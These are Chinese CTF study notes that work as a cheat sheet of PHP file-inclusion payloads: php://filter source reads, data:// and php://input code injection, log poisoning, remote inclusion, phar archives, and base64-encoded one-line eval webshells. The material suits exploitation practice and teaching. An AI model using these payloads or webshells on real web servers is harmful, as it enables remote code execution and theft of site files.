写在开头可能会用到的提醒
提醒
- 文件包含可以使用绝对路径,例如?file=/flag
伪协议
- 遇到文件包含(include)首先想到伪协议,filter,data,input,zip等
- 读取文件,base64编码
- php://filter/convert.base64-encode/resource=
- 读取文件,将读取到的文件中的字母往后ASCII+13,如果不足+13便会-13,例如ctfshow变为pgsfubj
- php://filter/string.rot13/resource=flag.php
- convert.iconv.* 过滤器,更多看文章底部链接
- 例如:php://filter//convert.iconv.SJIS.UCS-4/resource=/var/www/html/flag.php
- 例如:include "php://filter/convert.base64-encode/resource="
- data伪协议,data://text/plain,<php代码>
- 例如:include "data://text/plain,<?=phpinfo();?>"
- data伪协议第二种写法,data://text/plain;base64,base代码
- 例如:include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTs/Pg=="
- input,php://input,post输入php代码
- 例如:include "php://input" 然后post输入代码
- 日志注入,将UA修改为一句话马,然后包含住日志文件,然后执行
- 例如:在UA等之类的输入php代码,然后包含include "/var/log/nginx/access.log"
- 远程包含,即包含url,需要php.ini开启配置,allow_url_fopen = On(默认开启),allow_url_include = On (默认关闭)
- 例如?file=http://baidu.com
- phar,phar://压缩包路径/压缩包里面的文件
- 例如shell.zip里面有shell.php,phar://shell.zip/shell.php
* - file_put_contents($file,$content)写入文件,$file将$content的内容base64decode放入1.php
- file=php://filter/write=convert.base64-decode/resource=1.php | content=PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8%2B
过滤器相关
- 使用php://filter/过滤器/resource=来读取文件,这边过滤器有很多
- 相关文章: https://blog.csdn.net/woshilnp/article/details/117266628
- 相关文章: https://www.jianshu.com/p/0a8339fcc269
做题用过的过滤器
convert.iconv.EUC-JP*.UCS-4*
convert.iconv.SJIS*.UCS-4*
协议
file协议
绝对路径 file:///flag
相对路径 file://../../flaginput协议
include "php://input"
如果这样子的话,可以POST直接传入POHP代码